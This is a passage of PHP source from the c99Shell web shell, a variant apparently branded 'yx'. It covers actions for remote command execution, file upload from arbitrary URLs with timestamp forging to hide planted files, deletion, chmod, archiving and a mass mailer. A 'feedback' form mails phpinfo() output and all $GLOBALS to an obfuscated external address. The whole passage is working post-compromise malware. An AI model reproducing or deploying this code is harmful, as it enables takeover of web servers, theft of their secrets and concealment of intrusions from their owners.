  1912.     echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
  1913.   }
  1914. }
  1915. if ($act == "update") { //Update c99Shell
  1916.   $ret = c99sh_getupdate(!!$confirmupdate);
  1917.   echo "<b>".$ret."</b>";
  1918.   if (stristr($ret,"new version")) {
  1919.     echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
  1920.   }
  1921. }
  1922. if ($act == "feedback") {
  1923.   $suppmail = base64_decode("czRsMXR5QGhvdG1haWwuY29t");
  1924.   if (!empty($submit)){
  1925.     $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  1926.     $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  1927.     if (!empty($fdbk_ref)) {
  1928.       $tmp = @ob_get_contents();
  1929.       ob_clean();
  1930.       phpinfo();
  1931.       $phpinfo = base64_encode(ob_get_contents());
  1932.       ob_clean();
  1933.       echo $tmp;
  1934.       $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  1935.     }
  1936.     mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
  1937.     echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
  1938.   }
  1939.   else {
  1940.     echo "<form action=\"".$surl."\" method=POST>".
  1941.          "<input type=hidden name=act value=feedback>".
  1942.          "<table class=contents><tr><td class=barheader colspan=2>".
  1943.          ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.</td></tr>".
  1944.          "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"></td</tr>".
  1945.          "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"></td></tr>".
  1946.          "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br>".
  1947.          "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info (Recommended for bug-fix)<br>".
  1948.          "*Language: English, Indonesian.</td></tr>".
  1949.          "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
  1950.          "</table>";
  1951.   }
  1952. }
  1953. if ($act == "yxmailer") {
  1954.   if (!empty($submit)){
  1955.     $headers = 'To: '.$dest_email."\r\n";
  1956.     $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
  1957.     if (mail($suppmail,$sender_subj,$sender_body,$header)) {
  1958.       echo "<center><b>Email sent!</b></center>";
  1959.     }
  1960.     else { echo "<center><b>Couldn't send email!</b></center>"; }
  1961.   }
  1962.   else {
  1963.     echo "<form action=\"".$surl."\" method=POST>".
  1964.          "<input type=hidden name=act value=yxmailer>".
  1965.          "<table class=contents><tr><td class=barheader colspan=2>".
  1966.          ".: $sh_name Mailer :.</td></tr>".
  1967.          "<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\" value=\"".htmlspecialchars($sender_name)."\"></td</tr>".
  1968.          "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\" value=\"".htmlspecialchars($sender_email)."\"></td></tr>".
  1969.          "<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\" value=\"".htmlspecialchars($dest_email)."\"></td></tr>".
  1970.          "<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\" value=\"".htmlspecialchars($sender_subj)."\"></td></tr>".
  1971.          "<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80 rows=10>".htmlspecialchars($sender_body)."</textarea><br>".
  1972.          "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
  1973.          "</table>";
  1974.   }
  1975. }
  1976. if ($act == "search") {
  1977.   echo "<div class=barheader>.: $sh_name File-System Search :.</div>";
  1978.   if (empty($search_in)) {$search_in = $d;}
  1979.   if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  1980.   if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  1981.   if (!empty($submit)) {
  1982.     $found = array();
  1983.     $found_d = 0;
  1984.     $found_f = 0;
  1985.     $search_i_f = 0;
  1986.     $search_i_d = 0;
  1987.     $a = array(
  1988.         "name"=>$search_name,
  1989.         "name_regexp"=>$search_name_regexp,
  1990.         "text"=>$search_text,
  1991.         "text_regexp"=>$search_text_regxp,
  1992.         "text_wwo"=>$search_text_wwo,
  1993.         "text_cs"=>$search_text_cs,
  1994.         "text_not"=>$search_text_not
  1995.     );
  1996.     $searchtime = getmicrotime();
  1997.     $in = array_unique(explode(";",$search_in));
  1998.     foreach($in as $v) {c99fsearch($v);}
  1999.     $searchtime = round(getmicrotime()-$searchtime,4);
  2000.     if (count($found) == 0) {echo "No files found!";}
  2001.     else {
  2002.       $ls_arr = $found;
  2003.       $disp_fullpath = TRUE;
  2004.       $act = "ls";
  2005.     }
  2006.   }
  2007.   echo "<table class=contents>".
  2008.        "<tr><td><form method=POST>".
  2009.        "<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
  2010.        "File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
  2011.        "<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
  2012.        "<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
  2013.        "<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
  2014.        "  <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
  2015.        "  <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
  2016.        "  <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
  2017.        "<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
  2018.        "</table>";
  2019.   if ($act == "ls") {
  2020.     $dspact = $act;
  2021.     echo "Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
  2022.          "<hr size=\"1\" noshade>";
  2023.   }
  2024. }
  2025. if ($act == "chmod") {
  2026.   $mode = fileperms($d.$f);
  2027.   if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  2028.   else {
  2029.     $form = TRUE;
  2030.     if ($chmod_submit)
  2031.   {
  2032.    $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  2033.    if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
  2034.    else {$err = "Can't chmod to ".$octet.".";}
  2035.   }
  2036.   if ($form)
  2037.   {
  2038.    $perms = parse_perms($mode);
  2039.    echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  2040.   }
  2041. }
  2042. }
  2043. if ($act == "upload") {
  2044.   $uploadmess = "";
  2045.   $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
  2046.   if (empty($uploadpath)) {$uploadpath = $d;}
  2047.   elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
  2048.   if (!empty($submit)) {
  2049.     global $_FILES;
  2050.     $uploadfile = $_FILES["uploadfile"];
  2051.     if (!empty($uploadfile["tmp_name"])) {
  2052.       if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
  2053.       else {$destin = $userfilename;}
  2054.       if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
  2055.         $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
  2056.       }
  2057.       else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
  2058.     }
  2059.     elseif (!empty($uploadurl)) {
  2060.       if (!empty($uploadfilename)) {$destin = $uploadfilename;}
  2061.       else {
  2062.         $destin = explode("/",$destin);
  2063.         $destin = $destin[count($destin)-1];
  2064.         if (empty($destin)) {
  2065.           $i = 0;
  2066.           $b = "";
  2067.           while(file_exists($uploadpath.$destin)) {
  2068.             if ($i > 0) {$b = "_".$i;}
  2069.             $destin = "upload".$b;
  2070.             $i++;
  2071.           }
  2072.         }
  2073.       }
  2074.       if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorrect URL!</b>";}
  2075.       else {
  2076.         $st = getmicrotime();
  2077.         $content = @file_get_contents($uploadurl);
  2078.         $dt = round(getmicrotime()-$st,4);
  2079.         if (!$content) {$uploadmess .=  "Can't download file!";}
  2080.         else {
  2081.           if ($filestealth) {$stat = stat($uploadpath.$destin);}
  2082.           $fp = fopen($uploadpath.$destin,"w");
  2083.           if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
  2084.           else {
  2085.             fwrite($fp,$content,strlen($content));
  2086.             fclose($fp);
  2087.             if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  2088.             $uploadmess .= "File saved from ".$uploadurl." !";
  2089.           }
  2090.         }
  2091.       }
  2092.     }
  2093.     else { echo "No file to upload!"; }
  2094.   }
  2095.   if ($miniform) {
  2096.     echo "<b>".$uploadmess."</b>";
  2097.     $act = "ls";
  2098.   }
  2099.   else {
  2100.     echo "<table><tr><td colspan=2 class=barheader>".
  2101.          ".: File Upload :.</td>".
  2102.          "<td colspan=2>".$uploadmess."</td></tr>".
  2103.          "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
  2104.          "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
  2105.          "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
  2106.          "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
  2107.          "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
  2108.          "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
  2109.          "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
  2110.          "</form></td></tr></table>";
  2111.   }
  2112. }
  2113. if ($act == "delete") {
  2114.   $delerr = "";
  2115.   foreach ($actbox as $v) {
  2116.     $result = FALSE;
  2117.     $result = fs_rmobj($v);
  2118.     if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
  2119.   }
  2120.   if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
  2121.   $act = "ls";
  2122. }
  2123. if (!$usefsbuff) {
  2124.   if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";}
  2125. }
  2126. else {
  2127.   if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
  2128.   elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
  2129.   elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
  2130.   if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
  2131.   elseif ($actpastebuff) {
  2132.     $psterr = "";
  2133.     foreach($sess_data["copy"] as $k=>$v) {
  2134.       $to = $d.basename($v);
  2135.       if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  2136.       if ($copy_unset) {unset($sess_data["copy"][$k]);}
  2137.     }
  2138.     foreach($sess_data["cut"] as $k=>$v) {
  2139.       $to = $d.basename($v);
  2140.       if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  2141.       unset($sess_data["cut"][$k]);
  2142.     }
  2143.     c99_sess_put($sess_data);
  2144.     if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  2145.     $act = "ls";
  2146.   }
  2147.   elseif ($actarcbuff) {
  2148.     $arcerr = "";
  2149.     if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  2150.     else {$ext = ".tar.gz";}
  2151.     if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  2152.     $cmdline .= " ".$actarcbuff_path;
  2153.     $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  2154.     foreach($objects as $v) {
  2155.       $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
  2156.       if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
  2157.       if (is_dir($v)) {
  2158.         if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
  2159.         $v .= "*";
  2160.       }
  2161.       $cmdline .= " ".$v;
  2162.     }
  2163.     $tmp = realpath(".");
  2164.     chdir($d);
  2165.     $ret = myshellexec($cmdline);
  2166.     chdir($tmp);
  2167.     if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  2168.     $ret = str_replace("\r\n","\n",$ret);
  2169.     $ret = explode("\n",$ret);
  2170.     if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  2171.     foreach($sess_data["cut"] as $k=>$v) {
  2172.       if (in_array($v,$ret)) {fs_rmobj($v);}
  2173.       unset($sess_data["cut"][$k]);
  2174.     }
  2175.     c99_sess_put($sess_data);
  2176.     if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  2177.     $act = "ls";
  2178.   }
  2179.   elseif ($actpastebuff) {
  2180.     $psterr = "";
  2181.     foreach($sess_data["copy"] as $k=>$v) {
  2182.       $to = $d.basename($v);
  2183.       if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  2184.       if ($copy_unset) {unset($sess_data["copy"][$k]);}
  2185.     }
  2186.     foreach($sess_data["cut"] as $k=>$v) {
  2187.       $to = $d.basename($v);
  2188.       if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  2189.       unset($sess_data["cut"][$k]);
  2190.     }
  2191.     c99_sess_put($sess_data);
  2192.     if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  2193.     $act = "ls";
  2194.   }
  2195. }
  2196. if ($act == "cmd") {
  2197.   @chdir($chdir);
  2198.   if (!empty($submit)) {
  2199.     echo "<div class=barheader>.: Result of Command Execution :.</div>";
  2200.     $olddir = realpath(".");
  2201.     @chdir($d);
  2202.     $ret = myshellexec($cmd);
  2203.     $ret = convert_cyr_string($ret,"d","w");
  2204.     if ($cmd_txt) {
  2205.       $rows = count(explode("\r\n",$ret))+1;
  2206.       if ($rows < 10) {$rows = 10; }
  2207.      if ($msie) { $cols = 113; }
  2208.      else { $cols = 117;}
  2209.      //echo "<textarea cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>";
  2210.       echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
  2211.     }
  2212.     else {echo $ret."<br>";}
  2213.     @chdir($olddir);
  2214.   }
  2215.   else {
  2216.     echo "<b>Command Execution</b>";
  2217.     if (empty($cmd_txt)) {$cmd_txt = TRUE;}
  2218.   }
  2219. }
  2220. if ($act == "ls") {
  2221.   if (count($ls_arr) > 0) { $list = $ls_arr; }
  2222.   else {
  2223.     $list = array();
  2224.     if ($h = @opendir($d)) {
  2225.       while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
  2226.       closedir($h);
  2227.     }
  2228.   }
  2229.   if (count($list) == 0) { echo "<div class=yxerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
  2230.   else {
  2231.     $objects = array();
  2232.     $vd = "f"; //Viewing mode
  2233.     if ($vd == "f") {
  2234.       $objects["head"] = array();
  2235.       $objects["folders"] = array();
  2236.       $objects["links"] = array();
  2237.       $objects["files"] = array();
  2238.       foreach ($list as $v) {
  2239.         $o = basename($v);
  2240.         $row = array();
  2241.         if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
  2242.         elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
  2243.         elseif (is_dir($v)) {
  2244.           if (is_link($v)) {$type = "LINK";}
  2245.           else {$type = "DIR";}
  2246.           $row[] = $v;
  2247.           $row[] = $type;
  2248.         }
  2249.         elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
  2250.         $row[] = filemtime($v);
  2251.         if (!$win) {
  2252.           $ow = posix_getpwuid(fileowner($v));
  2253.           $gr = posix_getgrgid(filegroup($v));
  2254.           $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
  2255.         }
  2256.         $row[] = fileperms($v);
  2257.         if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  2258.         elseif (is_link($v)) {$objects["links"][] = $row;}
  2259.         elseif (is_dir($v)) {$objects["folders"][] = $row;}
  2260.         elseif (is_file($v)) {$objects["files"][] = $row;}
  2261.         $i++;
  2262.       }
  2263.       $row = array();
  2264.       $row[] = "<b>Name</b>";
  2265.       $row[] = "<b>Size</b>";
  2266.       $row[] = "<b>Date Modified</b>";
  2267.       if (!$win) {$row[] = "<b>Owner/Group</b>";}
  2268.       $row[] = "<b>Perms</b>";
  2269.       $row[] = "<b>Action</b>";
  2270.       $parsesort = parsesort($sort);
  2271.       $sort = $parsesort[0].$parsesort[1];
  2272.       $k = $parsesort[0];
  2273.       if ($parsesort[1] != "a") {$parsesort[1] = "d";}
  2274.       $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
  2275.       $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
  2276.       $row[$k] .= $y;
  2277.       for($i=0;$i<count($row)-1;$i++) {
  2278.        if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
  2279.       }
  2280.       $v = $parsesort[0];
  2281.       usort($objects["folders"], "tabsort");
  2282.       usort($objects["links"], "tabsort");
  2283.       usort($objects["files"], "tabsort");
  2284.       if ($parsesort[1] == "d") {
  2285.         $objects["folders"] = array_reverse($objects["folders"]);
  2286.         $objects["files"] = array_reverse($objects["files"]);
  2287.       }
  2288.       $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
  2289.       $tab = array();
  2290.       $tab["cols"] = array($row);
  2291.       $tab["head"] = array();
  2292.       $tab["folders"] = array();
  2293.       $tab["links"] = array();
  2294.       $tab["files"] = array();
  2295.       $i = 0;
  2296.       foreach ($objects as $a) {
  2297.         $v = $a[0];
  2298.         $o = basename($v);
  2299.         $dir = dirname($v);
  2300.         if ($disp_fullpath) {$disppath = $v;}
  2301.         else {$disppath = $o;}
  2302.         $disppath = str2mini($disppath,60);
  2303.         if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  2304.         elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  2305.         foreach ($regxp_highlight as $r) {
  2306.           if (ereg($r[0],$o)) {
  2307.             if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
  2308.             else {
  2309.               $r[1] = round($r[1]);
  2310.               $isdir = is_dir($v);
  2311.               if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
  2312.                 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
  2313.                 $disppath = $r[2].$disppath.$r[3];
  2314.                 if ($r[4]) {break;}
  2315.               }
  2316.             }
  2317.           }
  2318.         }
  2319.         $uo = urlencode($o);
  2320.         $ud = urlencode($dir);
  2321.         $uv = urlencode($v);
  2322.         $row = array();
  2323.         if ($o == ".") {
  2324.           $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
  2325.           $row[] = "CURDIR";
  2326.         }
  2327.         elseif ($o == "..") {
  2328.           $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
  2329.           $row[] = "UPDIR";
  2330.         }
  2331.         elseif (is_dir($v)) {
  2332.           if (is_link($v)) {
  2333.             $disppath .= " => ".readlink($v);
  2334.             $type = "LINK";
  2335.             $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
  2336.           }
  2337.           else {
  2338.             $type = "DIR";
  2339.             $row[] =  "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
  2340.           }
  2341.           $row[] = $type;
  2342.         }
  2343.         elseif(is_file($v)) {
  2344.           $ext = explode(".",$o);
  2345.           $c = count($ext)-1;
  2346.           $ext = $ext[$c];
  2347.           $ext = strtolower($ext);
  2348.           $row[] =  "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
  2349.           $row[] = view_size($a[1]);
  2350.         }
  2351.         $row[] = date("d.m.Y H:i:s",$a[2]);
  2352.         if (!$win) {$row[] = $a[3];}
  2353.         $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
  2354.         if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
  2355.         else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
  2356.         if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
  2357.         else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
  2358.         if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
  2359.         elseif (is_link($v)) {$tab["links"][] = $row;}
  2360.         elseif (is_dir($v)) {$tab["folders"][] = $row;}
  2361.         elseif (is_file($v)) {$tab["files"][] = $row;}
  2362.         $i++;
  2363.       }
  2364.     }
  2365.     // Compiling table
  2366.     $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  2367.     echo "<div class=barheader>.: ";
  2368.     if (!empty($yx_infohead)) { echo $yx_infohead; }
  2369.     else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
  2370.     echo " :.</div>\n";
  2371.     echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
  2372.          "<table class=explorer>";
  2373.     foreach($table as $row) {
  2374.       echo "<tr>";
  2375.       foreach($row as $v) {echo "<td>".$v."</td>";}
  2376.       echo "</tr>\r\n";
  2377.     }
  2378.     echo "</table>".
  2379.          "<script>".
  2380.          "function ls_setcheckboxall(status) {".
  2381.          " var id = 1; var num = ".(count($table)-2).";".
  2382.          " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
  2383.         "}".
  2384.         "function ls_reverse_all() {".
  2385.         " var id = 1; var num = ".(count($table)-2).";".
  2386.         " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
  2387.         "}".
  2388.         "</script>".
  2389.          "<div align=\"right\">".
  2390.          "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
  2391.          "<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
  2392.     if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
  2393.       echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"yx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  2394.     }
  2395.     echo "<select name=act><option value=\"".$act."\">With selected:</option>";
  2396.     echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
  2397.     echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  2398.     if ($usefsbuff) {
  2399.       echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
  2400.       echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
  2401.       echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  2402.     }
  2403.     echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
  2404.     echo "</form>";
  2405.   }
  2406. }
  2407. if ($act == "tools") //Define Yourself
  2408. {
  2409.  
  2410. }
  2411. if ($act == "phpfsys") {
  2412.   echo "<div align=left>";
  2413.   $fsfunc = $phpfsysfunc;
  2414.   if ($fsfunc=="copy") {
